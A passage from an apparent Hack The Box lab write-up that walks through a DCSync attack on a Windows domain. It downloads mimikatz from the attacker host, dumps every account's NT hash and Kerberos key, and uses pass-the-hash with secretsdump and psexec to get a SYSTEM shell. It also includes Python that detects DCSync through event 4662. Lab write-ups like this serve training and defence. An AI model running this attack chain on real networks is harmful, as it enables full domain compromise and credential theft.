DCSync Attack


As discovered earlier with BloodHound, the ssa_6010 account holds DCSync privileges (directory replication rights) over the target domain.

Since the account's password has not been recovered, the DCSync attack cannot be performed remotely. However, mimikatz can be run locally from the existing session on the host.

PS C:\tmp> curl http://10.10.14.226/mimikatz.exe -o C:\tmp\mimikatz.exe

Delivery complete.

PS C:\tmp> .\mimikatz.exe
.\mimikatz.exe
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz # 

This drops into the mimikatz shell.

Hashdump


mimikatz # lsadump::dcsync /dc:dc1.blazorized.htb /domain:BLAZORIZED.HTB /all /csv
[DC] 'BLAZORIZED.HTB' will be the domain
[DC] 'dc1.blazorized.htb' will be the DC server
[DC] Exporting domain 'BLAZORIZED.HTB'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1109	NU_1056	    abe496a00e60878932c084c9db511f94	66048
1110	NU_1057	    59e98e58c973a5cb2b125a17ff91b6a8	66048
1111	NU_1058	    6ac2dfc65463962ed19b653b409046ba	66048
1118	RSA_4811	4368391035803bf58273e1273692285b	66048
1120	RSA_4812	c66e4531c81de604e3531018fdad81cb	66048
1121	RSA_4813	2c84dfeb21e075dc5fc2c56447bdf9d6	66048
1122	RSA_4814	e7ddd56fabdb8fb1ebe6c43ff5fe815a	66048
1125	SSA_6011	be1ce1381c084dc4cda8159a665b3c59	66048
1126	SSA_6012	08db7bd0f2482f4e4cb0b1f6864f88e1	66048
1127	SSA_6013	ef37b4e655b62e664b6f9ae67133f2e6	66048
1128	LSA_3211	7c8fed15e80ed63db789ad740cda2f18	66048
1129	LSA_3212	72bab07816477b4aeffca4f709efbaa5	66048
1131	LSA_3213	e80b666e0ee68cd0a6516a92e75231cc	66048
502	    krbtgt	    a001ebf25825cadb6b423a2d28378467	514
1002	DC1$	    4b4ed5dfaa22dc4e41c279c0c62b9ee2	532480
1117	NU_1055	    63001e8b2d13ee358ad7d6de4590fed3	66048
500	    Administrator	f55ed1465179ba374ec1cad05b34a5f3	66048
1107	RSA_4810	381b793bde4dea233ae34bb1d9ce38f5	66048
1124	SSA_6010	798d0354e026fd168b91063f09184c9f	66048

Dumping NT hashes. The /csv output lists each account's RID, name, NT hash and userAccountControl value; the Administrator NT hash from this dump is enough to run secretsdump from the attacking host against the DC (pass-the-hash) and repeat the dump remotely.
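From the defender's side, the DCSync call above is a replication request that the domain controller records in its Security log as event 4662 (with Directory Service Access auditing enabled), where the Properties field carries the DS-Replication-Get-Changes control-access GUIDs and the subject is not a domain controller. The following Python is an added example, not part of the original writeup or of mimikatz, that flags such records in constructed sample events; the flattened key=value record layout and the DC1$ allowlist are assumptions.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.
Added example for this writeup, not from the page, mimikatz or Impacket; the sample
records are constructed, flattened to key=value pairs as a SIEM might store them."""
import re

# Control-access rights that a directory replication request exercises.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)
KV_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample records: the DC replicating is legitimate, a user account
# requesting replication is the DCSync signature, the rest is ordinary noise.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC1$ SubjectDomainName=BLAZORIZED ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=SSA_6010 SubjectDomainName=BLAZORIZED ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=RSA_4810 SubjectDomainName=BLAZORIZED ObjectType=user "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624 SubjectUserName=SSA_6010 SubjectDomainName=BLAZORIZED LogonType=3",
]


def parse_event(line):
    """Turn one flattened record into a dict; GUIDs in Properties become a set."""
    fields = dict(KV_RE.findall(line))
    fields["guids"] = {g.lower() for g in GUID_RE.findall(fields.get("Properties", ""))}
    return fields


def is_dcsync(event, dc_accounts):
    """True when a principal other than a domain controller used a replication right."""
    if event.get("EventID") != "4662":
        return False
    # DCs replicate with each other constantly, so their machine accounts are
    # allowlisted; anything else (including sync accounts such as Azure AD
    # Connect's MSOL_*) should be allowlisted deliberately, not silently.
    if event.get("SubjectUserName", "").upper() in dc_accounts:
        return False
    return bool(event["guids"] & REPLICATION_GUIDS)


def find_dcsync(lines, dc_accounts=frozenset({"DC1$"})):
    """Return, in order, the subject accounts whose records look like DCSync."""
    return [e["SubjectUserName"] for e in map(parse_event, lines) if is_dcsync(e, dc_accounts)]
```

Against the sample records only SSA_6010 is flagged; DC1$ exercises the same rights but is a domain controller, and the RSA_4810 record is an ordinary object read.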

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ impacket-secretsdump BLAZORIZED.HTB/administrator@dc1.blazorized.htb -hashes :f55ed1465179ba374ec1cad05b34a5f3 -no-pass -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x5149446d0c0f1684ead5919b7267eccb
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bcdce18681c9164efd0e14607497edb4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
BLAZORIZED\DC1$:aes256-cts-hmac-sha1-96:264d43979aa337ff88a1889bbf92c11862c40aa8f3de87d0e8247674879333da
BLAZORIZED\DC1$:aes128-cts-hmac-sha1-96:4b37e41fce7c0b54556e738cab7e7023
BLAZORIZED\DC1$:des-cbc-md5:61a40e5e57b5194c
BLAZORIZED\DC1$:plain_password_hex:b00d3c772c7c6dc9295d60492f43bd30202af0827f09bb67d7e715d101ac94e2b18985380329c9a0b7e95fdad731af706a3825c37221ca17891905ce16d604268e405df549438b64e5cbdc99299e59320d17ba0a4d07cf740b6d5199e71d1e423b937eba2566654efb8b9394c80d984d9ac59b17ba5ac2c4e59f70154441453671fb1a9bd6fbcad5dea4e45d8fa3cd83d9a910ebc24b4ce504712b22f9721047ef47a8f7381ff9ea6405d98c9b8f5440b5a111e7eaff7d7220376affaf8ca82983650838e07f46cbd223916b1028a27fbc77d48f49e4adcdb8b1663042394188758ae6d1c05d930ebab45d76321379c6
BLAZORIZED\DC1$:aad3b435b51404eeaad3b435b51404ee:4b4ed5dfaa22dc4e41c279c0c62b9ee2:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdce3e201baf796d87b66a9ca837e97fcad2b495d
dpapi_userkey:0xed8a895f2eb40b316076673ec64d1e139f90cf03
[*] NL$KM 
 0000   A2 52 9D 31 0B B7 1C 75  45 D6 4B 76 41 2D D3 21   .R.1...uE.KvA-.!
 0010   C6 5C DD 04 24 D3 07 FF  CA 5C F4 E5 A0 38 94 14   .\..$....\...8..
 0020   91 64 FA C7 91 D2 0E 02  7A D6 52 53 B4 F4 A9 6F   .d......z.RS...o
 0030   58 CA 76 00 DD 39 01 7D  C5 F7 8F 4B AB 1E DC 63   X.v..9.}...K...c
NL$KM:a2529d310bb71c7545d64b76412dd321c65cdd0424d307ffca5cf4e5a03894149164fac791d20e027ad65253b4f4a96f58ca7600dd39017dc5f78f4bab1edc63
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f55ed1465179ba374ec1cad05b34a5f3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a001ebf25825cadb6b423a2d28378467:::
blazorized.htb\RSA_4810:1107:aad3b435b51404eeaad3b435b51404ee:381b793bde4dea233ae34bb1d9ce38f5:::
blazorized.htb\NU_1056:1109:aad3b435b51404eeaad3b435b51404ee:abe496a00e60878932c084c9db511f94:::
blazorized.htb\NU_1057:1110:aad3b435b51404eeaad3b435b51404ee:59e98e58c973a5cb2b125a17ff91b6a8:::
blazorized.htb\NU_1058:1111:aad3b435b51404eeaad3b435b51404ee:6ac2dfc65463962ed19b653b409046ba:::
blazorized.htb\NU_1055:1117:aad3b435b51404eeaad3b435b51404ee:63001e8b2d13ee358ad7d6de4590fed3:::
blazorized.htb\RSA_4811:1118:aad3b435b51404eeaad3b435b51404ee:4368391035803bf58273e1273692285b:::
blazorized.htb\RSA_4812:1120:aad3b435b51404eeaad3b435b51404ee:c66e4531c81de604e3531018fdad81cb:::
blazorized.htb\RSA_4813:1121:aad3b435b51404eeaad3b435b51404ee:2c84dfeb21e075dc5fc2c56447bdf9d6:::
blazorized.htb\RSA_4814:1122:aad3b435b51404eeaad3b435b51404ee:e7ddd56fabdb8fb1ebe6c43ff5fe815a:::
blazorized.htb\SSA_6010:1124:aad3b435b51404eeaad3b435b51404ee:798d0354e026fd168b91063f09184c9f:::
blazorized.htb\SSA_6011:1125:aad3b435b51404eeaad3b435b51404ee:be1ce1381c084dc4cda8159a665b3c59:::
blazorized.htb\SSA_6012:1126:aad3b435b51404eeaad3b435b51404ee:08db7bd0f2482f4e4cb0b1f6864f88e1:::
blazorized.htb\SSA_6013:1127:aad3b435b51404eeaad3b435b51404ee:ef37b4e655b62e664b6f9ae67133f2e6:::
blazorized.htb\LSA_3211:1128:aad3b435b51404eeaad3b435b51404ee:7c8fed15e80ed63db789ad740cda2f18:::
blazorized.htb\LSA_3212:1129:aad3b435b51404eeaad3b435b51404ee:72bab07816477b4aeffca4f709efbaa5:::
blazorized.htb\LSA_3213:1131:aad3b435b51404eeaad3b435b51404ee:e80b666e0ee68cd0a6516a92e75231cc:::
DC1$:1002:aad3b435b51404eeaad3b435b51404ee:4b4ed5dfaa22dc4e41c279c0c62b9ee2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
Administrator:aes128-cts-hmac-sha1-96:df4dbea7fcf2ef56722a6741439a9f81
Administrator:des-cbc-md5:310e2a0438583dce
krbtgt:aes256-cts-hmac-sha1-96:6fbd8e680330075f57dfef87611756c3b64a17f2da580f124f87c95ca23a99a3
krbtgt:aes128-cts-hmac-sha1-96:267c72742cbc75ee902b87931cd285c0
krbtgt:des-cbc-md5:ab296e8a580d467f
blazorized.htb\RSA_4810:aes256-cts-hmac-sha1-96:e48de8bb2599d654097a5970801f1e881d9be5686113a1311dece1307e22727d
blazorized.htb\RSA_4810:aes128-cts-hmac-sha1-96:d03656e41ca1f7a6f10cf4122b86a984
blazorized.htb\RSA_4810:des-cbc-md5:ab466b1f13683738
blazorized.htb\NU_1056:aes256-cts-hmac-sha1-96:99f5372eb03d11b68d4ec0563be747aa2738b731305ce16ac557ed95327140ea
blazorized.htb\NU_1056:aes128-cts-hmac-sha1-96:c5f2e39f662aa84bb943c7929e4c1b19
blazorized.htb\NU_1056:des-cbc-md5:5d64e34ac7108361
blazorized.htb\NU_1057:aes256-cts-hmac-sha1-96:99a21bf60af441d61072f12238ddd12c34128b242fff816f7cd310e9d5ec5767
blazorized.htb\NU_1057:aes128-cts-hmac-sha1-96:540db208fbcf6cf85395a69021a3def3
blazorized.htb\NU_1057:des-cbc-md5:2ac72c52b9d6d9b5
blazorized.htb\NU_1058:aes256-cts-hmac-sha1-96:4c3d34f68ca15ea1701dfe294adb2e12c003214070b80fff5a33b39444d94c3f
blazorized.htb\NU_1058:aes128-cts-hmac-sha1-96:8bc3df305384e00d92fd71c970227297
blazorized.htb\NU_1058:des-cbc-md5:f2e5a72cae94b0e5
blazorized.htb\NU_1055:aes256-cts-hmac-sha1-96:5d4785e965671cd529986da058f95501e9b4f6fcdb09ad438f20c4f83711f367
blazorized.htb\NU_1055:aes128-cts-hmac-sha1-96:0c9e3adbc13a0765c40787ffac5a39be
blazorized.htb\NU_1055:des-cbc-md5:df798fa47a105e79
blazorized.htb\RSA_4811:aes256-cts-hmac-sha1-96:58bb946b0cf46fd9f0244deb848be158ebeeb83e6f3b4be225af7525e4001ab9
blazorized.htb\RSA_4811:aes128-cts-hmac-sha1-96:48f8b244c63b1a86338cbcc0f165d3da
blazorized.htb\RSA_4811:des-cbc-md5:589bcbab52490761
blazorized.htb\RSA_4812:aes256-cts-hmac-sha1-96:e630866aeeb8ca1bdabf1addfd2babb5ee25c3600d0b9f97ce134c21987b3ca7
blazorized.htb\RSA_4812:aes128-cts-hmac-sha1-96:e198b36b581c86dd1ccd9c7aa80a44b9
blazorized.htb\RSA_4812:des-cbc-md5:e0cbad7adac1156e
blazorized.htb\RSA_4813:aes256-cts-hmac-sha1-96:c96e7947c1cfe0157869712a399fa476c951ca8047cfa769d57bb560914b554a
blazorized.htb\RSA_4813:aes128-cts-hmac-sha1-96:b4c4e402eea383df835d7907e83d7bb0
blazorized.htb\RSA_4813:des-cbc-md5:e6020416ef433d80
blazorized.htb\RSA_4814:aes256-cts-hmac-sha1-96:6ba18d60c93c9dfde4229a8d0a9387f991b8befd7593f819c2efa1f42e92e751
blazorized.htb\RSA_4814:aes128-cts-hmac-sha1-96:6ee9c98b2f3df72452c714e39280684e
blazorized.htb\RSA_4814:des-cbc-md5:8f4a154f83f4e352
blazorized.htb\SSA_6010:aes256-cts-hmac-sha1-96:ea97f88aebdcef5b51d2f2f31496eb35ca46c1e69a20fd9bb85a12af4fd5c6a5
blazorized.htb\SSA_6010:aes128-cts-hmac-sha1-96:bbd55eb8c2e43457e9046a496ce9c0b6
blazorized.htb\SSA_6010:des-cbc-md5:19e358c22925a702
blazorized.htb\SSA_6011:aes256-cts-hmac-sha1-96:5c4884b05b5c2047af79070e97e20298c231cb331860a08d2f4f76f7139f49a8
blazorized.htb\SSA_6011:aes128-cts-hmac-sha1-96:c326b48e27d68ceba0709d64d5252794
blazorized.htb\SSA_6011:des-cbc-md5:e3a25df48f6e5e08
blazorized.htb\SSA_6012:aes256-cts-hmac-sha1-96:127038633f50298a7fe71bef73986ffe194e52179a8cf225da2f30cc25a4a617
blazorized.htb\SSA_6012:aes128-cts-hmac-sha1-96:7376c0e7a15c83a8fd715bec1526d9cc
blazorized.htb\SSA_6012:des-cbc-md5:45f28a582c344007
blazorized.htb\SSA_6013:aes256-cts-hmac-sha1-96:6ae76f676b2842481de6bb5676373682d1a2981a7cf594ac583f0b1487b16fe7
blazorized.htb\SSA_6013:aes128-cts-hmac-sha1-96:1c94468ee6092aa5258a66bd943e1349
blazorized.htb\SSA_6013:des-cbc-md5:c8b902aeb9574c3b
blazorized.htb\LSA_3211:aes256-cts-hmac-sha1-96:faadbb1444366ca00b1999438b18a56c128769c780b698f329bafe8ed6bd3ce0
blazorized.htb\LSA_3211:aes128-cts-hmac-sha1-96:fffa5164d5c93572bda604a0582683e1
blazorized.htb\LSA_3211:des-cbc-md5:31c86d61e32526e3
blazorized.htb\LSA_3212:aes256-cts-hmac-sha1-96:a534868b73581c90cdfae87f57697c7cfd7aa182263a872ae102eacf5ee9fa25
blazorized.htb\LSA_3212:aes128-cts-hmac-sha1-96:5719fa6dc2c6c0bb0f988f88f780f1dd
blazorized.htb\LSA_3212:des-cbc-md5:6126e5bf67a7ef2a
blazorized.htb\LSA_3213:aes256-cts-hmac-sha1-96:db929c1d88fd1b6a780df0c51a1829248971dcf4392fa4dd79e5db5b59a90196
blazorized.htb\LSA_3213:aes128-cts-hmac-sha1-96:777123969a90bd927496d180e9f1a30c
blazorized.htb\LSA_3213:des-cbc-md5:3d620d07da5e57d0
DC1$:aes256-cts-hmac-sha1-96:264d43979aa337ff88a1889bbf92c11862c40aa8f3de87d0e8247674879333da
DC1$:aes128-cts-hmac-sha1-96:4b37e41fce7c0b54556e738cab7e7023
DC1$:des-cbc-md5:80d04c8540b9ef54
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise: the full NTDS.DIT contents (NT hashes and Kerberos keys for every domain account, including krbtgt and the DC1$ machine account) have been extracted.

Shell Drop


┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ impacket-psexec BLAZORIZED.HTB/administrator@dc1.blazorized.htb -hashes :f55ed1465179ba374ec1cad05b34a5f3 -no-pass -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Requesting shares on dc1.blazorized.htb.....
[*] Found writable share ADMIN$
[*] Uploading file cofCQWSp.exe
[*] Opening SVCManager on dc1.blazorized.htb.....
[*] Creating service AxIH on dc1.blazorized.htb.....
[*] Starting service AxIH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.5933]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC1
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.11.22
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

System Level Compromise